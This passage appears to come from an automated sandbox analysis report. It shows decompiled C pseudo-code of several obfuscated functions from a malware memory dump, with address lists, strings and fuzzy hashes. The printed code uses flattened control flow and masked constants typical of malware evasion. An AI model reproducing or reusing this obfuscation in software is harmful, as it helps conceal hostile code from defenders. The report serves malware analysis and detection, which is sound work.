								if(_t192 == _t182) {
									E10011BE1(_v32, _v36, _v64, _t230, _v8);
									_t231 =  &(_t231[3]);
									_t221 =  !=  ? 1 : _t221;
									_t192 = 0x3f88eb9;
									while(1) {
										L1:
										_t182 = 0x462c85d;
										goto L2;
									}
								} else {
									if(_t192 == 0x74f887c) {
										_t185 = E1001DCE6(_v40, _v44, _t192, _v68, _v12);
										_t191 = _t185;
										_t231 =  &(_t231[4]);
										if(_t185 != 0) {
											_t192 = 0xd0db84d;
											while(1) {
												L1:
												_t182 = 0x462c85d;
												goto L2;
											}
										}
									} else {
										if(_t192 == 0xae30308) {
											_t229 =  *0x10025208 + 0x1c;
											_t187 = 0x5c;
											while( *_t229 != _t187) {
												_t229 = _t229 + 2;
											}
											_t227 = _t229 + 2;
											_t192 = 0x74f887c;
											while(1) {
												L1:
												_t182 = 0x462c85d;
												goto L2;
											}
										} else {
											if(_t192 == 0xd0db84d) {
												_t230 = E10015F55(_t227, _v52, _t191, _v16);
												_t231 =  &(_t231[3]);
												_t182 = 0x462c85d;
												_t192 =  !=  ? 0x462c85d : 0xd87e31d;
												continue;
											} else {
												if(_t192 != 0xd87e31d) {
													goto L21;
												} else {
													E10010839(_v20, _t191, _v4, _v24);
												}
											}
										}
									}
								}
							}
							L10:
							return _t221;
						}
						_t192 = 0xae30308;
						L21:
					} while (_t192 != 0xd66e3bd);
					goto L10;
				}
			}

0x1001d8ad
0x1001d8b0
0x1001d8be
0x1001d8c9
0x1001d8ce
0x1001d8d9
0x1001d8db
0x1001d8de
0x1001d8e2
0x1001d8ea
0x1001d8f7
0x1001d8fb
0x1001d900
0x1001d908
0x1001d910
0x1001d918
0x1001d91d
0x1001d925
0x1001d92d
0x1001d935
0x1001d93a
0x1001d942
0x1001d94a
0x1001d952
0x1001d957
0x1001d95f
0x1001d967
0x1001d96f
0x1001d974
0x1001d97c
0x1001d989
0x1001d98d
0x1001d995
0x1001d99d
0x1001d9a5
0x1001d9ad
0x1001d9b5
0x1001d9bd
0x1001d9c2
0x1001d9c7
0x1001d9cf
0x1001d9df
0x1001d9e3
0x1001d9eb
0x1001d9f3
0x1001d9fb
0x1001da03
0x1001da08
0x1001da10
0x1001da1d
0x1001da1e
0x1001da27
0x1001da2b
0x1001da33
0x1001da3b
0x1001da43
0x1001da50
0x1001da54
0x1001da5c
0x1001da64
0x1001da6f
0x1001da7b
0x1001da80
0x1001da86
0x1001da8e
0x1001da9a
0x1001da9f
0x1001daa5
0x1001daad
0x1001dab5
0x1001dabd
0x1001dac2
0x1001daca
0x1001dad6
0x1001dad9
0x1001dadd
0x1001dae1
0x1001dae5
0x1001dae9
0x1001daf1
0x1001daf9
0x1001daf9
0x1001daf9
0x1001dafe
0x00000000
0x1001dafe
0x1001db10
0x1001dc17
0x1001dc1e
0x00000000
0x1001db16
0x1001db18
0x1001dbef
0x1001dbf6
0x1001dbfc
0x1001dbff
0x1001daf9
0x1001daf9
0x1001daf9
0x00000000
0x1001daf9
0x1001db1e
0x1001db24
0x1001dbc6
0x1001dbcb
0x1001dbcd
0x1001dbd2
0x1001dbd4
0x1001daf9
0x1001daf9
0x1001daf9
0x00000000
0x1001daf9
0x1001daf9
0x1001db2a
0x1001db30
0x1001db9a
0x1001db9d
0x1001dba3
0x1001dba0
0x1001dba0
0x1001dba8
0x1001dbab
0x1001daf9
0x1001daf9
0x1001daf9
0x00000000
0x1001daf9
0x1001db32
0x1001db38
0x1001db79
0x1001db7b
0x1001db85
0x1001db8a
0x00000000
0x1001db3a
0x1001db40
0x00000000
0x1001db46
0x1001db54
0x1001db5a
0x1001db40
0x1001db38
0x1001db30
0x1001db24
0x1001db18
0x1001db5b
0x1001db64
0x1001db64
0x1001dc28
0x1001dc2d
0x1001dc2d
0x00000000
0x1001dc39

Strings

*m?, xrefs: 1001D925
4>A, xrefs: 1001DA5C
Dw, xrefs: 1001DB70
a), xrefs: 1001D957
Dw, xrefs: 1001D8F2

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: *m?$4>A$Dw$Dw$a)
API String ID: 0-1538557058
Opcode ID: 407a72fd8eb18715afd17362003fef4430d87769568c7dcbc5e1206b11f46008
Instruction ID: cd5a916d434739c2f2ba083a7fb160479a487a3eab6a9957e76b4ce0e915d48f
Opcode Fuzzy Hash: 407a72fd8eb18715afd17362003fef4430d87769568c7dcbc5e1206b11f46008
Instruction Fuzzy Hash: 789142755093419FC398EF25D48A40FBBE1EBC4798F50891EF6869A260D7B1C989CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10019EB5, Relevance: 6.5, Strings: 5, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10019EB5() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t198;
				void* _t206;
				signed int _t207;
				intOrPtr* _t209;
				signed int _t210;
				signed int _t211;
				void* _t212;
				void* _t231;
				signed int* _t235;

				_t235 =  &_v92;
				_v20 = 0x18b5dc;
				_v20 = _v20 | 0x09341f0e;
				_v20 = _v20 ^ 0x893cbfdf;
				_v80 = 0xf37aad;
				_v80 = _v80 + 0x517e;
				_v80 = _v80 ^ 0xfbe51d43;
				_v80 = _v80 | 0x05667c89;
				_v80 = _v80 ^ 0xff76fdeb;
				_v56 = 0x98d97b;
				_v56 = _v56 >> 9;
				_v56 = _v56 + 0xffffa410;
				_v56 = _v56 ^ 0xfff32d0b;
				_v88 = 0x12afbf;
				_v88 = _v88 ^ 0x4f52bd8c;
				_v88 = _v88 << 4;
				_v88 = _v88 + 0xffffd075;
				_v88 = _v88 ^ 0xf40eba16;
				_v60 = 0x6d17ad;
				_v60 = _v60 | 0xd1adfb61;
				_v60 = _v60 >> 0xa;
				_v60 = _v60 ^ 0x00384c17;
				_v32 = 0xbfe428;
				_v4 = 0;
				_v32 = _v32 * 0x2f;
				_t231 = 0x8dcf6a8;
				_v32 = _v32 ^ 0x2337da77;
				_v72 = 0xa9d333;
				_v72 = _v72 + 0xffff2b97;
				_v72 = _v72 ^ 0xde093312;
				_v72 = _v72 ^ 0x01ee7e6c;
				_v72 = _v72 ^ 0xdf441718;
				_v44 = 0xbd8216;
				_v44 = _v44 + 0xffff93f1;
				_t210 = 0x18;
				_v44 = _v44 / _t210;
				_v44 = _v44 ^ 0x00068bd3;
				_v48 = 0x961e8c;
				_v48 = _v48 << 2;
				_v48 = _v48 + 0xffffde0d;
				_v48 = _v48 ^ 0x02583b39;
				_v52 = 0x64e2ec;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x7f602a80;
				_v52 = _v52 ^ 0x79243993;
				_v76 = 0x125363;
				_v76 = _v76 >> 8;
				_v76 = _v76 | 0x8bc2c757;
				_v76 = _v76 + 0x5ce;
				_v76 = _v76 ^ 0x8bc66a85;
				_v84 = 0xeaf3a8;
				_v84 = _v84 | 0x1836b2d3;
				_v84 = _v84 >> 2;
				_v84 = _v84 + 0xffff78cf;
				_v84 = _v84 ^ 0x063853d0;
				_v24 = 0x24b42e;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 ^ 0x000d2953;
				_v28 = 0xb9496a;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x01758507;
				_v64 = 0xebfe90;
				_v64 = _v64 * 0x43;
				_v64 = _v64 * 0x11;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x0005ed5c;
				_v68 = 0x88718f;
				_v68 = _v68 >> 7;
				_v68 = _v68 | 0x9e78f0d9;
				_t207 = _v4;
				_t211 = 0x29;
				_v68 = _v68 / _t211;
				_v68 = _v68 ^ 0x03db63c3;
				_v16 = 0x83acd3;
				_v16 = _v16 * 0x29;
				_v16 = _v16 ^ 0x151c19c4;
				_v92 = 0xde5b05;
				_v92 = _v92 >> 9;
				_v92 = _v92 + 0xffff049b;
				_v92 = _v92 >> 0xf;
				_v92 = _v92 ^ 0x0009c641;
				_v36 = 0x706ab6;
				_v36 = _v36 >> 4;
				_v36 = _v36 ^ 0x0006be5c;
				_v40 = 0x57eb24;
				_v40 = _v40 << 0xd;
				_v40 = _v40 * 0x46;
				_v40 = _v40 ^ 0x497bf90e;
				_v12 = 0x305134;
				_v12 = _v12 | 0xebe83d09;
				_v12 = _v12 ^ 0xebf65d84;
				while(1) {
					L1:
					_t212 = 0x5c;
					while(1) {
						_t198 = 0xde7a60e;
						do {
							L3:
							while(_t231 != 0xf5e8de) {
								if(_t231 == 0x487e2df) {
									E10001AE5(_v8, _v40, _v12);
								} else {
									if(_t231 == 0x8dcf6a8) {
										_t231 = 0x9689464;
										continue;
									} else {
										if(_t231 == 0x9689464) {
											_t209 =  *0x10025208 + 0x1c;
											while( *_t209 != _t212) {
												_t209 = _t209 + 2;
											}
											_t207 = _t209 + 2;
											_t231 = 0xf5e8de;
											_t198 = 0xde7a60e;
											continue;
										} else {
											if(_t231 != _t198) {
												goto L15;
											} else {
												_t206 = E1001E11E(_t207, _v92, _v36, _v8);
												_t231 = 0x487e2df;
												_v4 = 0 | _t206 == 0x00000000;
												goto L1;
											}
										}
									}
								}
								L18:
								return _v4;
							}
							_push(_v32);
							_push(_v60);
							_push(_v88);
							_t213 = _v56;
							E100169EB(E1000416C(_v56, 0x10001894),  &_v8, _v56, _v72, _v56, _v44, _v48, _v52, _v76, _v80, _v84, _v20, _v24, _t213, _t213, _v28);
							_t231 =  ==  ? 0xde7a60e : 0x5c014af;
							E1000B952(_v64, _t199, _v68, _v16);
							_t235 =  &(_t235[0x14]);
							_t198 = 0xde7a60e;
							_t212 = 0x5c;
							L15:
						} while (_t231 != 0x5c014af);
						goto L18;
					}
				}
			}

0x10019eb5
0x10019ebc
0x10019ec6
0x10019ed0
0x10019ed8
0x10019ee0
0x10019ee8
0x10019ef0
0x10019ef8
0x10019f00
0x10019f08
0x10019f0d
0x10019f15
0x10019f1d
0x10019f25
0x10019f2d
0x10019f32
0x10019f3a
0x10019f42
0x10019f4a
0x10019f52
0x10019f57
0x10019f5f
0x10019f67
0x10019f70
0x10019f74
0x10019f79
0x10019f81
0x10019f89
0x10019f91
0x10019f99
0x10019fa1
0x10019fa9
0x10019fb1
0x10019fbf
0x10019fc2
0x10019fc6
0x10019fce
0x10019fd6
0x10019fdb
0x10019fe3
0x10019feb
0x10019ff3
0x10019ff8
0x1001a000
0x1001a008
0x1001a010
0x1001a015
0x1001a01d
0x1001a025
0x1001a02d
0x1001a035
0x1001a03d
0x1001a042
0x1001a04a
0x1001a052
0x1001a05a
0x1001a05f
0x1001a067
0x1001a06f
0x1001a073
0x1001a07b
0x1001a088
0x1001a091
0x1001a095
0x1001a09a
0x1001a0a2
0x1001a0aa
0x1001a0af
0x1001a0bf
0x1001a0c3
0x1001a0cb
0x1001a0cf
0x1001a0d7
0x1001a0e4
0x1001a0e8
0x1001a0f0
0x1001a0f8
0x1001a0fd
0x1001a105
0x1001a10a
0x1001a112
0x1001a11a
0x1001a11f
0x1001a127
0x1001a12f
0x1001a139
0x1001a13d
0x1001a145
0x1001a14d
0x1001a155
0x1001a15d
0x1001a15d
0x1001a15f
0x1001a160
0x1001a160
0x1001a165
0x00000000
0x1001a165
0x1001a16f
0x1001a276
0x1001a175
0x1001a17b
0x1001a1ce
0x00000000
0x1001a17d
0x1001a183
0x1001a1ba
0x1001a1c2
0x1001a1bf
0x1001a1bf
0x1001a1c7
0x1001a1ca
0x1001a160
0x00000000
0x1001a185
0x1001a187
0x00000000
0x1001a18d
0x1001a19b
0x1001a1a4
0x1001a1ae
0x00000000
0x1001a1ae
0x1001a187
0x1001a183
0x1001a17b
0x1001a27c
0x1001a287
0x1001a287
0x1001a1d5
0x1001a1de
0x1001a1e2
0x1001a1e6
0x1001a227
0x1001a249
0x1001a24c
0x1001a251
0x1001a254
0x1001a25b
0x1001a25c
0x1001a25c
0x00000000
0x1001a268
0x1001a160

Strings

S), xrefs: 1001A05F
=, xrefs: 1001A14D
~Q, xrefs: 10019EE0
d, xrefs: 10019FEB
$W, xrefs: 1001A127

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: =$$W$S)$~Q$d
API String ID: 0-1553496798
Opcode ID: b1e0d46755680b08f3397d45fbd648637f947021971c6ef85c390cdeb9c129c6
Instruction ID: b7a6a4261f4b8038236b4dc52219fdfb79471c790adc06aea5d4431d6c6a1f5f
Opcode Fuzzy Hash: b1e0d46755680b08f3397d45fbd648637f947021971c6ef85c390cdeb9c129c6
Instruction Fuzzy Hash: 71A11E725083409FC358CF65D88A40FBBF1BB85798F104A1DF1999A260D7B1CA89CF46

Uniqueness

Uniqueness Score: -1.00%

Function 10002800, Relevance: 6.4, Strings: 5, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E10002800() {
				char _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				short* _t193;
				void* _t197;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int* _t244;

				_t244 =  &_v596;
				_v528 = _v528 & 0x00000000;
				_v532 = 0x84116b;
				_t197 = 0xd1d5180;
				_v540 = 0xa5f47d;
				_v540 = _v540 >> 0xe;
				_v540 = _v540 ^ 0x00088dd5;
				_v596 = 0x9e64f6;
				_v596 = _v596 | 0x3506463e;
				_v596 = _v596 + 0xffffd78f;
				_t233 = 0x14;
				_v596 = _v596 / _t233;
				_v596 = _v596 ^ 0x02a71414;
				_v548 = 0xc13951;
				_t234 = 0xf;
				_v548 = _v548 / _t234;
				_v548 = _v548 ^ 0x00082dda;
				_v572 = 0x1c5d99;
				_t235 = 0x59;
				_v572 = _v572 * 0x78;
				_v572 = _v572 | 0x91f8dbd2;
				_v572 = _v572 ^ 0x9dfb7d13;
				_v552 = 0x4a31c1;
				_v552 = _v552 * 0x26;
				_v552 = _v552 | 0x054f8920;
				_v552 = _v552 ^ 0x0f4f403b;
				_v544 = 0xf795cc;
				_v544 = _v544 | 0x8c394177;
				_v544 = _v544 ^ 0x8cf7b2a3;
				_v592 = 0x4ce0e7;
				_v592 = _v592 * 0x12;
				_v592 = _v592 >> 0x10;
				_t236 = 0x3d;
				_v592 = _v592 / _t235;
				_v592 = _v592 ^ 0x000d7123;
				_v536 = 0x9d3a9a;
				_v536 = _v536 / _t236;
				_v536 = _v536 ^ 0x000388ce;
				_v568 = 0x9902d8;
				_v568 = _v568 + 0x65;
				_t237 = 0x5a;
				_v568 = _v568 * 0x2a;
				_v568 = _v568 ^ 0x191339ff;
				_v580 = 0x37d667;
				_v580 = _v580 | 0xc5ff36dc;
				_v580 = _v580 * 0x4f;
				_v580 = _v580 ^ 0x19f5678b;
				_v564 = 0x7b861b;
				_v564 = _v564 / _t237;
				_t238 = 0x1f;
				_v564 = _v564 / _t238;
				_v564 = _v564 ^ 0x00033d08;
				_v588 = 0x583437;
				_v588 = _v588 >> 0xf;
				_t239 = 0x5c;
				_v588 = _v588 * 0x17;
				_v588 = _v588 >> 3;
				_v588 = _v588 ^ 0x000fe435;
				_v556 = 0x591eab;
				_v556 = _v556 / _t239;
				_t240 = 0x7b;
				_v556 = _v556 * 0x65;
				_v556 = _v556 ^ 0x00612e6a;
				_v584 = 0xf4eb44;
				_v584 = _v584 / _t240;
				_t241 = 0x30;
				_v584 = _v584 / _t241;
				_v584 = _v584 >> 2;
				_v584 = _v584 ^ 0x000236d4;
				_v576 = 0xfbf923;
				_v576 = _v576 + 0xa832;
				_v576 = _v576 + 0x46d1;
				_v576 = _v576 ^ 0x00f3986f;
				_v560 = 0x1a0f72;
				_v560 = _v560 << 6;
				_v560 = _v560 + 0xffff74fc;
				_v560 = _v560 ^ 0x06808731;
				do {
					while(_t197 != 0x76ef89b) {
						if(_t197 == 0xd1d5180) {
							_t197 = 0x76ef89b;
							continue;
						}
						if(_t197 == 0xe7e8f98) {
							_t193 = E10001A5C( &_v524, _v588, _v556);
							 *_t193 = 0;
							_t197 = 0xebf697f;
							continue;
						}
						if(_t197 != 0xebf697f) {
							goto L10;
						}
						return E1001F0A7( &_v524, _v584, _v576,  &_v524, E10009DA8, _v560, 0);
					}
					_push(_v572);
					_push(_v548);
					_push(_v596);
					E100049CE( *0x10025208 + 0x230,  *0x10025208 + 0x1c, E1000416C(_v540, 0x100017d4), _v552, _v544, _v540, _v592, _v536);
					_t244 =  &(_t244[0xa]);
					_t193 = E1000B952(_v568, _t191, _v580, _v564);
					_t197 = 0xe7e8f98;
					L10:
				} while (_t197 != 0x2feded7);
				return _t193;
			}

0x10002800
0x10002806
0x1000280d
0x10002815
0x1000281a
0x10002822
0x10002827
0x1000282f
0x10002836
0x1000283d
0x1000284d
0x10002852
0x10002858
0x10002860
0x1000286c
0x10002871
0x10002877
0x1000287f
0x1000288c
0x1000288f
0x10002893
0x1000289b
0x100028a3
0x100028b0
0x100028b4
0x100028bc
0x100028c4
0x100028cc
0x100028d4
0x100028dc
0x100028e9
0x100028ed
0x100028f8
0x100028f9
0x100028ff
0x10002907
0x10002917
0x1000291d
0x10002925
0x1000292d
0x10002937
0x1000293a
0x1000293e
0x10002946
0x1000294e
0x1000295b
0x1000295f
0x10002967
0x10002977
0x1000297f
0x10002984
0x1000298a
0x10002997
0x100029a4
0x100029b3
0x100029b6
0x100029ba
0x100029bf
0x100029c7
0x100029d7
0x100029e0
0x100029e3
0x100029e7
0x100029ef
0x100029ff
0x10002a07
0x10002a0a
0x10002a0e
0x10002a13
0x10002a1b
0x10002a23
0x10002a2b
0x10002a33
0x10002a3b
0x10002a43
0x10002a48
0x10002a50
0x10002a58
0x10002a58
0x10002a62
0x10002ab8
0x00000000
0x10002ab8
0x10002a66
0x10002aa9
0x10002ab1
0x10002ab4
0x00000000
0x10002ab4
0x10002a6a
0x00000000
0x00000000
0x00000000
0x10002a8f
0x10002abc
0x10002ac5
0x10002ac9
0x10002b01
0x10002b06
0x10002b17
0x10002b1e
0x10002b20
0x10002b20
0x00000000

Strings

#q, xrefs: 100028FF
L, xrefs: 100028DC
e, xrefs: 1000292D
j.a, xrefs: 100029E7
74X, xrefs: 10002997

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: #q$74X$e$j.a$L
API String ID: 0-2319450033
Opcode ID: 1afbc38f7269a50dbd329b10c7df7cd1012685a28aabd51ee5de4e9cdc3db929
Instruction ID: 18ca0c0d7e69f72a4a9a2dfb6e2b02148f196a55981312c5c0e9009089e3c5a3
Opcode Fuzzy Hash: 1afbc38f7269a50dbd329b10c7df7cd1012685a28aabd51ee5de4e9cdc3db929
Instruction Fuzzy Hash: 3F814371609341AFD358DF26C98594BBBF2FBC4758F40991EF1868A260D7B18949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 1000D4EE, Relevance: 6.4, Strings: 5, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1000D4EE(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				short _v116;
				char* _v120;
				char* _v124;
				signed int _v128;
				char _v132;
				char _v652;
				char _v1172;
				void* _t215;
				signed int _t242;
				signed int _t245;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				void* _t272;
				void* _t273;

				_push(_a8);
				_t272 = __edx;
				_t273 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t215);
				_v72 = 0xe171e;
				_v72 = _v72 | 0xf01a05f5;
				_v72 = _v72 ^ 0xf01e17fe;
				_v8 = 0x5479d4;
				_v8 = _v8 + 0x49c2;
				_v8 = _v8 + 0xfffff4a3;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x02a5c7dc;
				_v56 = 0x640455;
				_v56 = _v56 << 5;
				_t248 = 0x24;
				_t245 = 0x1e;
				_v56 = _v56 * 0x63;
				_v56 = _v56 ^ 0xd5b593e0;
				_v68 = 0x43665a;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x000997eb;
				_v60 = 0x762234;
				_v60 = _v60 + 0xcdf5;
				_v60 = _v60 ^ 0x007a254f;
				_v28 = 0x62b24b;
				_v28 = _v28 / _t248;
				_v28 = _v28 ^ 0xf6147369;
				_v28 = _v28 << 4;
				_v28 = _v28 ^ 0x616a0154;
				_v12 = 0x74c106;
				_v12 = _v12 ^ 0x806b6934;
				_v12 = _v12 | 0xcc35de4f;
				_v12 = _v12 + 0x950;
				_v12 = _v12 ^ 0xcc4852bc;
				_v40 = 0x3edd6a;
				_v40 = _v40 << 7;
				_v40 = _v40 + 0xffffa837;
				_v40 = _v40 ^ 0x1f6af1a5;
				_v20 = 0xfe754a;
				_v20 = _v20 ^ 0x1e522895;
				_v20 = _v20 + 0x8da9;
				_v20 = _v20 + 0xffff4897;
				_v20 = _v20 ^ 0x1ea2620f;
				_v76 = 0x956614;
				_v76 = _v76 + 0xffffa220;
				_v76 = _v76 ^ 0x0098c003;
				_v92 = 0x85d9e7;
				_v92 = _v92 << 5;
				_v92 = _v92 ^ 0x10ba290a;
				_v96 = 0x58ddf6;
				_v96 = _v96 << 7;
				_v96 = _v96 ^ 0x2c610c47;
				_v36 = 0xcebaa3;
				_v36 = _v36 / _t245;
				_v36 = _v36 ^ 0x5b56c74f;
				_t249 = 0x57;
				_v36 = _v36 * 0x2e;
				_v36 = _v36 ^ 0x68656b4b;
				_v84 = 0x47f2be;
				_v84 = _v84 | 0xf0ba0f68;
				_v84 = _v84 ^ 0xf0f4657f;
				_v100 = 0xd4d087;
				_v100 = _v100 / _t249;
				_v100 = _v100 ^ 0x00083d8f;
				_v32 = 0xd4e152;
				_t250 = 0x3a;
				_v32 = _v32 * 0x48;
				_v32 = _v32 + 0xfffff4db;
				_v32 = _v32 + 0x7789;
				_v32 = _v32 ^ 0x3bd625e3;
				_v64 = 0x48f9dd;
				_v64 = _v64 >> 7;
				_v64 = _v64 ^ 0x000de6fa;
				_v52 = 0x79ee22;
				_v52 = _v52 | 0x6a8af955;
				_v52 = _v52 ^ 0xf7eaf7e1;
				_v52 = _v52 ^ 0x9d1e34e4;
				_v24 = 0x433725;
				_v24 = _v24 + 0xffff100f;
				_v24 = _v24 + 0xffff02d5;
				_v24 = _v24 ^ 0xfab235ad;
				_v24 = _v24 ^ 0xfaf52d8d;
				_v48 = 0xc7a4ad;
				_v48 = _v48 >> 9;
				_v48 = _v48 / _t250;
				_v48 = _v48 ^ 0x000b39ff;
				_v44 = 0xa28e8b;
				_v44 = _v44 ^ 0x3ed23343;
				_v44 = _v44 | 0xc395d234;
				_v44 = _v44 ^ 0xfff0ec38;
				_v16 = 0x57a1ba;
				_v16 = _v16 | 0xeeb5fb57;
				_v16 = _v16 ^ 0xee4fd103;
				_v16 = _v16 ^ 0x00b7cb5a;
				_v88 = 0xa7c680;
				_v88 = _v88 | 0xaedc6595;
				_v88 = _v88 ^ 0xaefc585d;
				_v80 = 0xc87702;
				_v80 = _v80 << 9;
				_v80 = _v80 ^ 0x90e373dc;
				E1001A5E3(_v68,  &_v132, _v60, _v28, _t245, _v12);
				E1001A5E3(_v40,  &_v652, _v20, _v76, 0x208, _v92);
				E1001A5E3(_v96,  &_v1172, _v36, _v84, 0x208, _v100);
				E1001DD9F(_v32, _t273, _v64,  &_v652, _v52);
				E1001DD9F(_v24, _t272, _v48,  &_v1172, _v44);
				_v128 = _v72;
				_v124 =  &_v652;
				_v120 =  &_v1172;
				_v116 = _v56 | _v8 | 0x00000410;
				_t242 = E10002B31(_v16, _v80,  &_v132);
				asm("sbb eax, eax");
				return  ~_t242 + 1;
			}

0x1000d4fa
0x1000d4fd
0x1000d4ff
0x1000d501
0x1000d504
0x1000d505
0x1000d506
0x1000d50b
0x1000d514
0x1000d51b
0x1000d522
0x1000d529
0x1000d530
0x1000d537
0x1000d53b
0x1000d542
0x1000d549
0x1000d553
0x1000d556
0x1000d557
0x1000d55a
0x1000d561
0x1000d568
0x1000d56c
0x1000d573
0x1000d57a
0x1000d581
0x1000d588
0x1000d596
0x1000d599
0x1000d5a0
0x1000d5a4
0x1000d5ab
0x1000d5b2
0x1000d5b9
0x1000d5c0
0x1000d5c7
0x1000d5ce
0x1000d5d5
0x1000d5d9
0x1000d5e0
0x1000d5e7
0x1000d5ee
0x1000d5f5
0x1000d5fc
0x1000d603
0x1000d60a
0x1000d611
0x1000d618
0x1000d61f
0x1000d626
0x1000d62a
0x1000d631
0x1000d638
0x1000d63c
0x1000d643
0x1000d651
0x1000d654
0x1000d65f
0x1000d660
0x1000d663
0x1000d66a
0x1000d671
0x1000d678
0x1000d681
0x1000d68f
0x1000d694
0x1000d69b
0x1000d6a6
0x1000d6a7
0x1000d6aa
0x1000d6b1
0x1000d6b8
0x1000d6bf
0x1000d6c6
0x1000d6ca
0x1000d6d1
0x1000d6d8
0x1000d6df
0x1000d6e6
0x1000d6ed
0x1000d6f4
0x1000d6fb
0x1000d702
0x1000d709
0x1000d710
0x1000d717
0x1000d723
0x1000d726
0x1000d72d
0x1000d734
0x1000d73b
0x1000d742
0x1000d749
0x1000d750
0x1000d757
0x1000d75e
0x1000d765
0x1000d76c
0x1000d773
0x1000d77a
0x1000d781
0x1000d785
0x1000d799
0x1000d7b6
0x1000d7ce
0x1000d7e8
0x1000d7ff
0x1000d807
0x1000d810
0x1000d819
0x1000d827
0x1000d838
0x1000d842
0x1000d84b

Strings

"y, xrefs: 1000D6D1
ZfC, xrefs: 1000D561
O%z, xrefs: 1000D581
Kkeh, xrefs: 1000D663
%7C, xrefs: 1000D6ED

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: "y$%7C$Kkeh$O%z$ZfC
API String ID: 0-635082997
Opcode ID: d79ac2ba9fae1967407edd7bbf4d13e88ad6e710dbad23b94f8f6c8bee647604
Instruction ID: b5cac03e07499c9baefaa66e9007d80b9965dd6b95c5faa204154c0db3ef9ea8
Opcode Fuzzy Hash: d79ac2ba9fae1967407edd7bbf4d13e88ad6e710dbad23b94f8f6c8bee647604
Instruction Fuzzy Hash: 1BA10EB5C0131DABDF59DFE1D88A4DEBBB2FB04318F208159E516BA260D7B41A46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10013B36, Relevance: 6.4, Strings: 5, Instructions: 174
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E10013B36(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t156;
				void* _t170;
				void* _t185;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				void* _t202;
				signed int* _t205;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t156);
				_v16 = 0x57712d;
				_t205 =  &(( &_v84)[4]);
				asm("stosd");
				_t202 = 0;
				_t185 = 0x9374fb6;
				asm("stosd");
				asm("stosd");
				_v36 = 0x78c1a1;
				_v36 = _v36 + 0xfffffebb;
				_v36 = _v36 ^ 0x0078c05d;
				_v24 = 0xab22eb;
				_v24 = _v24 + 0xffff16d0;
				_v24 = _v24 ^ 0x00aa39ba;
				_v48 = 0x67aaea;
				_v48 = _v48 >> 3;
				_v48 = _v48 >> 1;
				_v48 = _v48 ^ 0x40067aae;
				_v28 = 0x11c4a2;
				_v28 = _v28 ^ 0x8089e9a2;
				_v28 = _v28 ^ 0xc0982d00;
				_v68 = 0x7f8318;
				_v68 = _v68 + 0x4681;
				_v68 = _v68 >> 3;
				_v68 = _v68 + 0xbd82;
				_v68 = _v68 ^ 0x001687b2;
				_v72 = 0x66f959;
				_v72 = _v72 ^ 0xa889e5aa;
				_v72 = _v72 | 0xeaba9451;
				_v72 = _v72 + 0x504f;
				_v72 = _v72 ^ 0xeaff1dbe;
				_v52 = 0xff3e18;
				_t198 = 0x1e;
				_v52 = _v52 * 0x5a;
				_v52 = _v52 ^ 0xe585d3b3;
				_v52 = _v52 ^ 0xbc3f4d8c;
				_v40 = 0x6cd333;
				_v40 = _v40 | 0x5bf10213;
				_v40 = _v40 ^ 0x5bf40b51;
				_v76 = 0x5b7716;
				_v76 = _v76 << 8;
				_v76 = _v76 / _t198;
				_t199 = 0x65;
